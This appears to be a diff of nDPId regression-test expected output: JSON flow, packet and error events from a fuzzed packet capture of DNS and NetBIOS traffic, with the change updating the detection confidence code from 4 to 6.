-00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.?.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.?.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1120471036317,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471036317,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CwoAR3gijw6AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAgAwAAcAMAAwAAQAAJRAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471036317,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471036318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":663,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471036317,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471036318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470848643,"flow_last_seen":1120470851639,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471036318,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1120471048339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471048339,"pkt":"ADBUADRWAODtAW69CABFAABIbFYAAIARSvvAqAECwKgBcgsLADUANESJJXMAAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1120471049334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69CABFAABIbFcAAIARSvrAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaU15Alb4AAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercimy.v?","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercimy.v?","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18432,"global_ts_msec":1120471051336} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18432,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69SABFAABIbFgAAIARQvnAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1120471053339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471053339,"pkt":"ADBUADRWAODtAW69CABFAABIbFkAAIARSvjAqAECwKoBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj8XR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120471057345} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471053339,"pkt":"ADBcADRHAODtAW69CABgAABIbFoAAIARSvfAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liRXdjaXR5AmRrAAAhgAE="} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470442140,"flow_last_seen":1120470442140,"flow_idle_time":620000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":19,"ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1292,65 +1292,65 @@ 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470187656,"flow_last_seen":1120470440137,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470865650,"flow_last_seen":1120470865650,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2805,"dst_port":51,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470865651,"flow_last_seen":1120470865651,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2805,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1120471065347,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471065347,"pkt":"ADBUADRWAODtAW69CABFAABEJXMAAIARSvrAqAECwKgBAQsMADUAMOiAPDIAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1120471065349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471065349,"pkt":"AODtAW69ADBUADRWCABFAABbAAFAAEARtz7AqAEBwKgBAgA1CgwAR8r8PDKAAAABAAHJAAAAATEBMAEwAzEyN0ppbi1hZGRyBGFycGEAABwAAcAMAAwAAQBsJxAADwlsb2NhbGhvc3QA"} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1120471067211,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120471067211,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABObF0AAIARSfDAqAECwKgB\/wALAIkAOls0hWcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 